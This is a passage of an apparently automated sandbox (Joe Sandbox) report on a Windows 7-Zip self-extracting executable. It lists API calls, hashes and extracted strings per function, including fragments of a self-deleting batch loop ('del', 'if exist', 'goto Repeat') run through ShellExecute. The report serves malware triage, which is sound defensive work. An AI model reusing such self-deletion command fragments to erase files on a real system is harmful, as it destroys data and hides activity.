                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 2e238170ea055109cb47943994eb06b5be56588a226d843496a50fd685f2b274
                                                                                                                                                              • Instruction ID: 6c26674a386588894a65653882a427808ea8405668eeb7e571557daf3fb138df
                                                                                                                                                              • Opcode Fuzzy Hash: 2e238170ea055109cb47943994eb06b5be56588a226d843496a50fd685f2b274
                                                                                                                                                              • Instruction Fuzzy Hash: 14F067B5A04209DF8B09CF99D48189EFBF5FF49310B1081A9EC1997350D731AA51CF95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D66DE7
                                                                                                                                                                • Part of subcall function 00D79450: _wmemmove.LIBCMTD ref: 00D7948E
                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00D8A398), ref: 00D66E7B
                                                                                                                                                              • _wtol.MSVCRT(00000000), ref: 00D66FA4
                                                                                                                                                              • _wtol.MSVCRT(00000000), ref: 00D66FCE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wtol$AllocatorDebugHeap_wmemmovelstrcmpi
                                                                                                                                                              • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title
                                                                                                                                                              • API String ID: 1673552667-694992937
                                                                                                                                                              • Opcode ID: 240c0542e05482b5e1a920b030936cdc5d1de41b3607b3cbf3eb66dd207690f9
                                                                                                                                                              • Instruction ID: f3dea7098aec7fc31cc341493ed08da2635e984be0272a7b1eea3ef07b517d4a
                                                                                                                                                              • Opcode Fuzzy Hash: 240c0542e05482b5e1a920b030936cdc5d1de41b3607b3cbf3eb66dd207690f9
                                                                                                                                                              • Instruction Fuzzy Hash: AF712AB4D11208EFD700EFA8ED1ABACB7B0EB01709F294069E505A73C2E6715B48DB75
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00D69410
                                                                                                                                                              • LoadIconW.USER32(00000000), ref: 00D69417
                                                                                                                                                              • GetSystemMetrics.USER32(00000032), ref: 00D69424
                                                                                                                                                              • GetSystemMetrics.USER32(00000031), ref: 00D6942D
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 00D6943A
                                                                                                                                                              • LoadImageW.USER32(00000000), ref: 00D69441
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000004B2), ref: 00D6949A
                                                                                                                                                              • SetWindowLongW.USER32(00000000,000004B2,000000F0), ref: 00D694B6
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000004B5), ref: 00D694CC
                                                                                                                                                              • SetWindowLongW.USER32(00000000,000004B5,000000F0), ref: 00D694E8
                                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00D69607
                                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00D69628
                                                                                                                                                                • Part of subcall function 00D69A30: GetWindowTextLengthW.USER32(00000000), ref: 00D69A44
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00D6968C
                                                                                                                                                              • LoadIconW.USER32(00000000), ref: 00D69693
                                                                                                                                                              • LoadIconW.USER32(00000000,00007F02), ref: 00D696A5
                                                                                                                                                              • LoadIconW.USER32(00000000,00007F01), ref: 00D696B7
                                                                                                                                                              • LoadIconW.USER32(00000000,00007F04), ref: 00D696C9
                                                                                                                                                              • SendMessageW.USER32(00000000,000004B1,00000172,00000001), ref: 00D696FB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Load$Icon$Long$HandleModule$MetricsSystem$ImageLengthMessageSendText
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1276301936-0
                                                                                                                                                              • Opcode ID: 5eed3836da321b005f7b374fd8f0a648e7172b503ec6b89731d445903e3b119e
                                                                                                                                                              • Instruction ID: 8d65e676869547bc91d6edb88eead29b04e156a50737d8c96a79cfdf17891e2f
                                                                                                                                                              • Opcode Fuzzy Hash: 5eed3836da321b005f7b374fd8f0a648e7172b503ec6b89731d445903e3b119e
                                                                                                                                                              • Instruction Fuzzy Hash: 94A12BB0A54305ABDB04DBA0DD6ABBEB779EB44701F144014F602BB3D1CA75AE41CBB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetDriveTypeW.KERNEL32(00D68375,?,?,?,?,?,?,?,?,?,?,?,?,00D68375,00D8D4FC), ref: 00D685D4
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00D68627
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6864A
                                                                                                                                                              • WriteFile.KERNEL32(000000FF,00000000,00D68375,del ",:Repeat), ref: 00D686EE
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00D68703
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00D68752
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00D6876E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$AllocatorAttributesCloseCreateDebugDriveExecuteHandleHeapShellTypeWrite
                                                                                                                                                              • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                                                                                              • API String ID: 3581052426-3467708659
                                                                                                                                                              • Opcode ID: 57150e25f753f5cba106b01f9d758f4c26d25fbc8f418a52c3fe22291fafc1bb
                                                                                                                                                              • Instruction ID: 1ec86e9be6c3bee59a1adb792363aa48b5a18342d83b6deee0de1b5f2be07c8a
                                                                                                                                                              • Opcode Fuzzy Hash: 57150e25f753f5cba106b01f9d758f4c26d25fbc8f418a52c3fe22291fafc1bb
                                                                                                                                                              • Instruction Fuzzy Hash: C4514B75800208ABDB04FBA1DC67BEDB774EF14704F548159F50AA60A1EF706A49CBB9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D68A60: GetDlgItem.USER32(?,00000000), ref: 00D68A72
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000004B3), ref: 00D69AA3
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000004B4), ref: 00D69AEA
                                                                                                                                                              • GetSystemMetrics.USER32(00000010), ref: 00D69BA6
                                                                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00D69BB1
                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00D69BBC
                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00D69BD0
                                                                                                                                                              • GetParent.USER32(00000000), ref: 00D69C0F
                                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00D69C38
                                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00D69C46
                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000004), ref: 00D69CD7
                                                                                                                                                                • Part of subcall function 00D699F0: SetWindowPos.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,00D69F21,?,?,?,?,?), ref: 00D69A1D
                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00D69C2A
                                                                                                                                                                • Part of subcall function 00D697C0: GetDlgItem.USER32(00000000,?), ref: 00D697D8
                                                                                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00D69E53
                                                                                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00D69E69
                                                                                                                                                                • Part of subcall function 00D68B40: GetClientRect.USER32(00000000,?), ref: 00D68B54
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MetricsSystem$ClientWindow$ItemLongRectScreen$Parent
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3176548655-0
                                                                                                                                                              • Opcode ID: 5cb56c0626b198b58b513f4c8365fa347026061449ca9e209118c83fae31119d
                                                                                                                                                              • Instruction ID: b1399d72685d7a4c20909e6d6da3660c856d210400ff07d0f6bbc1b663689081
                                                                                                                                                              • Opcode Fuzzy Hash: 5cb56c0626b198b58b513f4c8365fa347026061449ca9e209118c83fae31119d
                                                                                                                                                              • Instruction Fuzzy Hash: F5E1C2B0E00219DFDB08DFA8D9A5AEEBBB5FF48300F144258E505AB395C774AD42CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetParent.USER32(?), ref: 00D6A4DC
                                                                                                                                                              • GetWindowLongW.USER32(00000000), ref: 00D6A4E3
                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00D6A502
                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 00D6A534
                                                                                                                                                              • GetSystemMetrics.USER32(00000031), ref: 00D6A53F
                                                                                                                                                              • GetSystemMetrics.USER32(00000032), ref: 00D6A54A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$MetricsProcSystem$CallLongParent
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2567644265-0
                                                                                                                                                              • Opcode ID: 3f0f501cb673b1f69793dc0da4dbcc835207d0b1ad03d2a19495b83c508ad718
                                                                                                                                                              • Instruction ID: 84dc580e6bc5674c0d3f6ba5d3bbf3486f36fb4aba7430ab0bd0a7304dd2949b
                                                                                                                                                              • Opcode Fuzzy Hash: 3f0f501cb673b1f69793dc0da4dbcc835207d0b1ad03d2a19495b83c508ad718
                                                                                                                                                              • Instruction Fuzzy Hash: DC41B8B5914209AFCB04CFA8D998EEEBBB9BB4C311F144648F946E7294C734E941CF61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7733A
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D77345
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D77350
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7735B
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D77366
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D77371
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7737C
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D77387
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D77392
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7739D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3936482309-0
                                                                                                                                                              • Opcode ID: 4f70e0e031cab179761b603fa600f71d3f6141713af46575c4d4872ab0f71458
                                                                                                                                                              • Instruction ID: 7efd0d3442b5b130e70a8421f4105a29a8e35585ffbf23f1a98cec433bb4f916
                                                                                                                                                              • Opcode Fuzzy Hash: 4f70e0e031cab179761b603fa600f71d3f6141713af46575c4d4872ab0f71458
                                                                                                                                                              • Instruction Fuzzy Hash: 42419A74900109EFDB08EF98C6A5BADB7B2EF44308F644188D4066B342CB75AF15DBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D6458E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap
                                                                                                                                                              • String ID: R$SetEnvironment
                                                                                                                                                              • API String ID: 571936431-1698439222
                                                                                                                                                              • Opcode ID: 5a11d0298a819ca0fa6f4b097eed2e9b3796e76e3d21f5bae3233830ba45467c
                                                                                                                                                              • Instruction ID: aa5a24cca6606a301eee74421f142afbe5e64ab77db7bd6879ff7eb1ef022f77
                                                                                                                                                              • Opcode Fuzzy Hash: 5a11d0298a819ca0fa6f4b097eed2e9b3796e76e3d21f5bae3233830ba45467c
                                                                                                                                                              • Instruction Fuzzy Hash: 50E19FB1D04158ABCB05EFE4E8A19FEBB75EF55304F088119F456AB252EB309A44CB70
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D62CC0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D62CCA
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D66ADE
                                                                                                                                                              • Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot.LIBCMTD ref: 00D66B07
                                                                                                                                                              • Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot.LIBCMTD ref: 00D66B59
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D66B7E
                                                                                                                                                              • Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot.LIBCMTD ref: 00D66BED
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessorVirtual$Root$Concurrency::details::Root::~$AllocatorDebugHeap$Concurrency::Root::
                                                                                                                                                              • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                                              • API String ID: 2885122008-372238525
                                                                                                                                                              • Opcode ID: 15a46ca9324dbd791293838a87817c1187c24da5e68adfa3e0a7f2bb1c224d02
                                                                                                                                                              • Instruction ID: ae812de3298718e8d7eb63e8b5806d1354a1da230a2d39284ce793d92108d7fa
                                                                                                                                                              • Opcode Fuzzy Hash: 15a46ca9324dbd791293838a87817c1187c24da5e68adfa3e0a7f2bb1c224d02
                                                                                                                                                              • Instruction Fuzzy Hash: CD416471D00148ABDB09FBE5EC92AEDBB38EF14304F544168F45266192EF31AB48CBB1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D69100: SendMessageW.USER32(00000000,?,00000000,000004B3), ref: 00D69120
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000004B5), ref: 00D6AA80
                                                                                                                                                              • SetWindowLongW.USER32(00000000,000004B5,000000F0), ref: 00D6AAAC
                                                                                                                                                              • GetSystemMenu.USER32(00000000,00000000,000004B4,00000000,000004B8,00000401,00000000,75300000,000004B8,00000001), ref: 00D6AADD
                                                                                                                                                              • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00D6AAF7
                                                                                                                                                              • SetFocus.USER32(00000000,000004B4,000004B8,00000401,00000000,75300000,000004B8,00000001), ref: 00D6AB0B
                                                                                                                                                              • IsWindow.USER32(00000000), ref: 00D6AB25
                                                                                                                                                              • EnableWindow.USER32(00000000,00000002), ref: 00D6AB3C
                                                                                                                                                              • ShowWindow.USER32(00000000,000004B5,00000000), ref: 00D6AB5D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$EnableLongMenu$FocusItemMessageSendShowSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2770945220-0
                                                                                                                                                              • Opcode ID: 89dea7f2ec49f445471257d26ce6736d8318ab7e2cdfbd00c01a0519b0fcb0b7
                                                                                                                                                              • Instruction ID: 3127b14f2a80690985a79c6fb60c5dc714c32fb9fc8319b47f65cbd56b4f89da
                                                                                                                                                              • Opcode Fuzzy Hash: 89dea7f2ec49f445471257d26ce6736d8318ab7e2cdfbd00c01a0519b0fcb0b7
                                                                                                                                                              • Instruction Fuzzy Hash: 8D41E870A50309ABDB04EBA4DD5ABAEB77AEB40701F104119E502BB3E1CB756D40CB75
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 00D698FA
                                                                                                                                                              • GetSystemMetrics.USER32(0000003D), ref: 00D6990F
                                                                                                                                                              • GetSystemMetrics.USER32(0000000B), ref: 00D69919
                                                                                                                                                              • GetSystemMetrics.USER32(0000003E), ref: 00D69929
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00D69963
                                                                                                                                                              • DrawTextW.USER32(00000000,00000000,000000FF,00000000,?), ref: 00D69984
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00D699C4
                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00D699D7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2466489532-0
                                                                                                                                                              • Opcode ID: 83213ad29445b9b520710ae0cbff0ac024836eac7c60714a262e0a19e14f4cf6
                                                                                                                                                              • Instruction ID: 8c17c5340a79ba9cba238afad238263ec90e7702ec0d4d08bbf42c9964da6352
                                                                                                                                                              • Opcode Fuzzy Hash: 83213ad29445b9b520710ae0cbff0ac024836eac7c60714a262e0a19e14f4cf6
                                                                                                                                                              • Instruction Fuzzy Hash: D431BA75910209EFCB04DFA8D998AAEFBB5EF48310F14C159E919A7390C7319A41CFA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D741E0: ??3@YAXPAX@Z.MSVCRT ref: 00D741F5
                                                                                                                                                                • Part of subcall function 00D741E0: ??2@YAPAXI@Z.MSVCRT ref: 00D7421A
                                                                                                                                                                • Part of subcall function 00D74280: ??3@YAXPAX@Z.MSVCRT ref: 00D74295
                                                                                                                                                                • Part of subcall function 00D74280: ??2@YAPAXI@Z.MSVCRT ref: 00D742AA
                                                                                                                                                              • std::exception::exception.LIBCMTD ref: 00D718C2
                                                                                                                                                              • std::exception::exception.LIBCMTD ref: 00D718CA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@std::exception::exception
                                                                                                                                                              • String ID: !$@$@$@
                                                                                                                                                              • API String ID: 1147900709-3902203808
                                                                                                                                                              • Opcode ID: ee080df5fc63fe9e49dba22cc232b619f44909f807105bd0b0cbdc273ec5a8c7
                                                                                                                                                              • Instruction ID: 9776476b90faf219e485d9b40f19d7342d91e5d3fd32360c27698eaccda2ecde
                                                                                                                                                              • Opcode Fuzzy Hash: ee080df5fc63fe9e49dba22cc232b619f44909f807105bd0b0cbdc273ec5a8c7
                                                                                                                                                              • Instruction Fuzzy Hash: E022EB74D11118DFCB18EFA8C8A1AADBBB6FF44304F148159E44AAB252EB306E45CF75
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00D63880: lstrlenW.KERNEL32(00D617FC,?,?,00D617FC,?,00D896DC), ref: 00D63888
                                                                                                                                                                • Part of subcall function 00D63880: lstrlenW.KERNEL32(?,?,00D617FC,?,00D896DC), ref: 00D63895
                                                                                                                                                                • Part of subcall function 00D63880: _wcsnicmp.MSVCRT ref: 00D638AC
                                                                                                                                                              • _wtol.MSVCRT(?), ref: 00D61A92
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
